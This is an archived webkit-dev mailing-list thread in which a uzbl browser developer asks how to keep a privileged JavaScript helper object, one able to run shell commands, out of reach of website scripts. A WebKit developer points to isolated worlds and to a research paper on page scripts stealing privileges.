Re: [webkit-dev] a simple isolatedworlds alternative for uzbl?
On Wed, 27 Jan 2010 23:01:17 -0800 Adam Barth aba...@webkit.org wrote: Getting this right with the approach you seem to be taking is extremely difficult. The problem is not that the local script is untrustworthy. The problem is that the web page it's interacting with might be able to steal its privileges. Thank you, but can you describe this a bit more? Even if we don't pass around the object or attach it to an object such as document or window, we are still vulnerable? How can the webpage steal privileges? Isolated worlds should be implemented in webkitgtk+ thanks to some contributors from Apple. I bet all that's left to do is add an API for accessing the functionality. The PDF is just being honest when it says reasonable assurance. I'd be extremely skeptical of someone who claims more than reasonable assurance for a commercial-grade system. Adam That's good to know. I'm looking forward to it. The reasonable assurance part, does this mean a problem with the design or is this more about potential issues with the (early) implementations? ___ webkit-dev mailing list webkit-dev@lists.webkit.org http://lists.webkit.org/mailman/listinfo.cgi/webkit-dev
Re: [webkit-dev] a simple isolatedworlds alternative for uzbl?
On Thu, 28 Jan 2010 08:01:19 -0800 Adam Barth aba...@webkit.org wrote: On Thu, Jan 28, 2010 at 12:40 AM, Dieter Plaetinck die...@plaetinck.be wrote: On Wed, 27 Jan 2010 23:01:17 -0800 Adam Barth aba...@webkit.org wrote: Getting this right with the approach you seem to be taking is extremely difficult. The problem is not that the local script is untrustworthy. The problem is that the web page it's interacting with might be able to steal its privileges. Thank you, but can you describe this a bit more? Even if we don't pass around the object or attach it to an object such as document or window, we are still vulnerable? How can the webpage steal privileges? For example, the attacker could use some of the techniques described in this paper: http://www.adambarth.com/papers/2009/adida-barth-jackson.pdf Thanks. very interesting article. I guess we can only wait for isolatedworlds to appear in the gtk+ port :) Dieter ___ webkit-dev mailing list webkit-dev@lists.webkit.org http://lists.webkit.org/mailman/listinfo.cgi/webkit-dev
[webkit-dev] Extra privileges for local javascripts with WebkitGtk
Hi guys, for the uzbl browser (www.uzbl.org) we want to give users the ability to execute their own javascripts with extra privileges. Extra privileges = executing uzbl commands which can do many actions, such as executing shell commands. But at the same time, we want js scripts from the users to be able to modify the DOM of webpages. The extra privileges should obviously never become available to javascripts from websites. Currently we implemented the so-called Uzbl object which has a 'run' method. See the 'eval_js' function in http://github.com/Dieterbe/uzbl/blob/master/uzbl-core.c for our current implementation. and 'JAVASCRIPT HELPER OBJECT' at http://github.com/Dieterbe/uzbl/blob/master/README It was brought to my attention that given the way js works (you can change core DOM functions such as window.addEventListener or document.createElement), stack/object inspection, and maybe more (mind you: I'm not familiar with how JS works at all, hence this mail) the Uzbl object can leak to the scope of js scripts of website, which is quite bad. See for a sample exploit: http://lists.uzbl.org/pipermail/uzbl-dev-uzbl.org/2010-January/000586.html Can you advise us on how to tackle this topic? Is there a clean solution for this problem? Thanks, Dieter ___ webkit-dev mailing list webkit-dev@lists.webkit.org http://lists.webkit.org/mailman/listinfo.cgi/webkit-dev